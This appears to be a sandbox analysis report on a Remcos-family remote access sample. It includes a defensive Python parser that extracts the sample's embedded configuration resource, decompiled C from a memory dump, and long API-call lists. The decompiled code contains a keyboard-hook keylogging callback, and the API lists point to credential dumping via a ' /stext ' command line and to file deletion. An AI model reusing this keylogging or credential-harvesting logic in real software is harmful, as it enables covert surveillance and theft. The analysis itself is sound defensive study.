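                                   The lookup in E00409D02 (FindResourceA with hModule 0, type 0xa = RT_RCDATA, name "SETTINGS", followed by LoadResource, LockResource and SizeofResource) is the place the Remcos family keeps its embedded configuration, and an analyst normally repeats it statically against the dumped image rather than running the sample. The Python below is an added example written for this page, not code from the report, the sandbox, or the sample: it walks the PE resource directory (type, then name, then language) to return that blob, matches the name case-insensitively as the Win32 API does, and takes a `mapped` flag for raw memory dumps whose sections already sit at their virtual addresses. `build_sample_pe`, `CONFIG_BLOB`, `SAMPLE_PE` and the language id 0x409 are constructed test fixtures, not data from the sample; the report says nothing about the blob's layout, so nothing here decodes it.

```python
import struct

RT_RCDATA = 10                      # the 0xa the sample passes to FindResourceA
IMAGE_DIRECTORY_ENTRY_RESOURCE = 2


def _parse_headers(pe: bytes):
    """Return (resource_dir_rva, [(va, vsize, raw_ptr, raw_size), ...]) for a PE32 or PE32+ image."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd_base = opt + (96 if magic == 0x10B else 112)   # DataDirectory start: PE32 vs PE32+
    res_rva = struct.unpack_from("<I", pe, dd_base + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE)[0]
    sections = []
    for i in range(nsec):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    return res_rva, sections


def _rva_to_offset(rva: int, sections, mapped: bool) -> int:
    if mapped:                      # raw memory dump: sections already sit at their virtual addresses
        return rva
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _entries(pe: bytes, base: int, dir_off: int):
    """Yield (key, offset, is_subdir) for one IMAGE_RESOURCE_DIRECTORY; key is an int id or a str name."""
    n_named, n_id = struct.unpack_from("<HH", pe, base + dir_off + 12)
    for i in range(n_named + n_id):
        name, data = struct.unpack_from("<II", pe, base + dir_off + 16 + 8 * i)
        if name & 0x80000000:       # IMAGE_RESOURCE_DIR_STRING_U: WORD length, then UTF-16LE characters
            s = base + (name & 0x7FFFFFFF)
            n = struct.unpack_from("<H", pe, s)[0]
            key = pe[s + 2:s + 2 + 2 * n].decode("utf-16-le")
        else:
            key = name
        yield key, data & 0x7FFFFFFF, bool(data & 0x80000000)


def find_rcdata(pe: bytes, name: str, mapped: bool = False):
    """Static equivalent of FindResourceA(0, name, RT_RCDATA) + LoadResource + SizeofResource.
    Returns (lang_id, bytes) or None; the name match is case-insensitive like the Win32 call."""
    res_rva, sections = _parse_headers(pe)
    base = _rva_to_offset(res_rva, sections, mapped)
    for t_key, t_off, t_dir in _entries(pe, base, 0):               # level 1: resource type
        if t_key != RT_RCDATA or not t_dir:
            continue
        for n_key, n_off, n_dir in _entries(pe, base, t_off):       # level 2: name or id
            if not (n_dir and isinstance(n_key, str) and n_key.upper() == name.upper()):
                continue
            for lang, d_off, d_dir in _entries(pe, base, n_off):    # level 3: language -> data entry
                if d_dir:
                    continue
                data_rva, size = struct.unpack_from("<II", pe, base + d_off)
                start = _rva_to_offset(data_rva, sections, mapped)
                return lang, pe[start:start + size]
    return None


# Constructed fixture (hypothetical, not bytes from the analysed sample): a PE32 whose only
# section is .rsrc, carrying RT_RCDATA / "SETTINGS" / language 0x409 -> CONFIG_BLOB.
CONFIG_BLOB = b"CONSTRUCTED-SETTINGS-BLOB"


def build_sample_pe(blob: bytes) -> bytes:
    RSRC_RVA, RSRC_RAW = 0x3000, 0x200
    name16 = "SETTINGS".encode("utf-16-le")
    r = bytearray(0x70)
    struct.pack_into("<IIHHHH", r, 0x00, 0, 0, 0, 0, 0, 1)           # root dir: one id entry (the type)
    struct.pack_into("<II", r, 0x10, RT_RCDATA, 0x80000000 | 0x18)   # -> subdirectory at 0x18
    struct.pack_into("<IIHHHH", r, 0x18, 0, 0, 0, 0, 1, 0)           # type dir: one named entry
    struct.pack_into("<II", r, 0x28, 0x80000000 | 0x48, 0x80000000 | 0x30)   # name string at 0x48, subdir at 0x30
    struct.pack_into("<IIHHHH", r, 0x30, 0, 0, 0, 0, 0, 1)           # name dir: one language entry
    struct.pack_into("<II", r, 0x40, 0x0409, 0x60)                   # -> IMAGE_RESOURCE_DATA_ENTRY at 0x60
    struct.pack_into("<H", r, 0x48, len(name16) // 2)
    r[0x4A:0x4A + len(name16)] = name16
    struct.pack_into("<IIII", r, 0x60, RSRC_RVA + 0x70, len(blob), 0, 0)   # data RVA, size, codepage, reserved
    r += blob
    pe = bytearray(RSRC_RAW)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)                           # e_lfanew
    pe[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", pe, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)   # COFF: i386, 1 section, PE32 opt hdr
    struct.pack_into("<H", pe, 0x58, 0x10B)                          # PE32 magic
    struct.pack_into("<II", pe, 0x58 + 96 + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE, RSRC_RVA, len(r))
    struct.pack_into("<8sIIII", pe, 0x138, b".rsrc", len(r), RSRC_RVA, len(r), RSRC_RAW)
    return bytes(pe) + bytes(r)


SAMPLE_PE = build_sample_pe(CONFIG_BLOB)
```

                                   Against a file on disk, `find_rcdata(open(path, "rb").read(), "SETTINGS")` returns the language id and the raw bytes. Against a raw process-memory region such as the dump source listed in this report (a region based at 0x400000), pass `mapped=True`: PointerToRawData no longer applies once the loader has mapped the sections, so RVAs are used as offsets directly. A rebuilt dump whose sections were realigned to file layout is read with the default.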

                                  C-Code - Quality: 100%
                                   			E0040532D(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {   // low-level keyboard hook callback: (this, nCode, wParam, lParam)
                                   				void* _t19;
                                   				void* _t26;
                                   				struct HHOOK__** _t32;
                                   				signed int _t33;
                                   
                                   				_t32 = _a4;
                                   				_t33 = 5;
                                   				memcpy( &(_t32[0x10]), _a16, _t33 << 2);   // copy the 5-DWORD KBDLLHOOKSTRUCT (vkCode, scanCode, flags, time, dwExtraInfo) to this+0x40
                                   				if(_a8 == 0) {                              // nCode == HC_ACTION
                                   					_t19 = _a12 - 0x100;                    // wParam: 0x100 == WM_KEYDOWN
                                   					if(_t19 == 0) {
                                   						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {   // 0x14 == VK_CAPITAL: remember the Caps Lock state
                                   							_t32[0xb] = _t32[0xb] & 0x00000000;
                                   						} else {
                                   							_t32[0xb] = 1;
                                   						}
                                   						E00406BA7(_t32);                    // key-down handlers (bodies not shown in this section)
                                   						E00406BCB(_t32);
                                   						E00405EB2(_t32);
                                   						if(_t32[0xb] == 0) {
                                   							E00406952(_t32);
                                   						}
                                   						_t32[0xb] = _t32[0xb] & 0x00000000;
                                   					} else {
                                   						_t26 = _t19 - 1;                    // 0x101 == WM_KEYUP
                                   						if(_t26 == 0) {
                                   							E00406BB9(_t32);
                                   							E00406BDD(_t32);
                                   							E00406B61(_t32);
                                   						} else {
                                   							if(_t26 == 3) {                 // 0x104 == WM_SYSKEYDOWN
                                   								E00406AD1(_t32);
                                   							}
                                   						}
                                   					}
                                   				}
                                   				return CallNextHookEx( *_t32, _a8, _a12, _a16);   // *this holds the HHOOK; the event is passed on, so typing is unaffected
                                   			}

                                  APIs
                                  • GetKeyState.USER32(00000014), ref: 00405381
                                  • GetKeyState.USER32(00000014), ref: 0040538A
                                    • Part of subcall function 00406AD1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415D38,?), ref: 00406B51
                                  • CallNextHookEx.USER32 ref: 004053CD
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                  • String ID:
                                  • API String ID: 98962008-0
                                  • Opcode ID: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                  • Instruction ID: db2238219e7acabf410f467048d0031229e8bae0499535dbb57e9f22420807a3
                                  • Opcode Fuzzy Hash: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                  • Instruction Fuzzy Hash: A0118E7520461996DF10AF3588817AF3A21EB85344F05547EB9426A2C2CABC98259B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                   			E00405156(void* __ecx) {                    // __thiscall: record the keyboard's primary language at this+0x38
                                   				signed int _t3;
                                   				signed int _t4;
                                   				intOrPtr _t6;
                                   				intOrPtr _t7;
                                   				void* _t8;
                                   
                                   				_t8 = __ecx;
                                   				_t3 = GetKeyboardLayout(0);             // HKL of the calling thread
                                   				_t4 = _t3 & 0x000003ff;                 // PRIMARYLANGID of the low word
                                   				_t6 = 9;                                // LANG_ENGLISH
                                   				if(_t4 == _t6) {
                                   					L3:
                                   					 *((intOrPtr*)(_t8 + 0x38)) = _t6;   // 9 is stored for English and for every layout that is not Italian
                                   					return _t4;
                                   				} else {
                                   					_t7 = 0x10;                         // LANG_ITALIAN
                                   					if(_t4 != _t7) {
                                   						goto L3;
                                   					} else {
                                   						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
                                   						return _t4;
                                   					}
                                   				}
                                   			}

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayout
                                  • String ID:
                                  • API String ID: 194098044-0
                                  • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction ID: 21b9efa670f21c68742e6ddf4daf796ac161ac54f97a083ce8069b5058884fb0
                                  • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction Fuzzy Hash: 27D05E36948B204EE764A618B882BE232A0EB94731F95443BE5821AAD4E5A468C20658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                   			E004124A0(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {   // CPUID wrapper: _a8 is the leaf, _a4 a 4-DWORD output buffer
                                   				intOrPtr _t6;
                                   				intOrPtr _t7;
                                   				intOrPtr* _t10;
                                   
                                   				_t10 = _a4;
                                   				_t6 = _a8;
                                   				asm("cpuid");                           // eax = leaf on entry; results come back in eax, ebx, ecx, edx
                                   				 *_t10 = _t6;
                                   				 *((intOrPtr*)(_t10 + 4)) = _t7;        // _t7 is never assigned above and slot +8 is shown as a constant:
                                   				 *((intOrPtr*)(_t10 + 8)) = 0;          // the decompiler did not recover all four result registers
                                   				 *((intOrPtr*)(_t10 + 0xc)) = __edx;
                                   				return _t6;
                                   			}

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                  • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                  • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                  • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                  • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                  • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                  • String ID: /stext "
                                  • API String ID: 1338134179-3856184850
                                  • Opcode ID: 1ce33ad10180f17a6c082a473abe56c480000efb03e1b482a5c4a1ccafc45b05
                                  • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                  • Opcode Fuzzy Hash: 1ce33ad10180f17a6c082a473abe56c480000efb03e1b482a5c4a1ccafc45b05
                                  • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • wcslen.MSVCRT ref: 00407E46
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
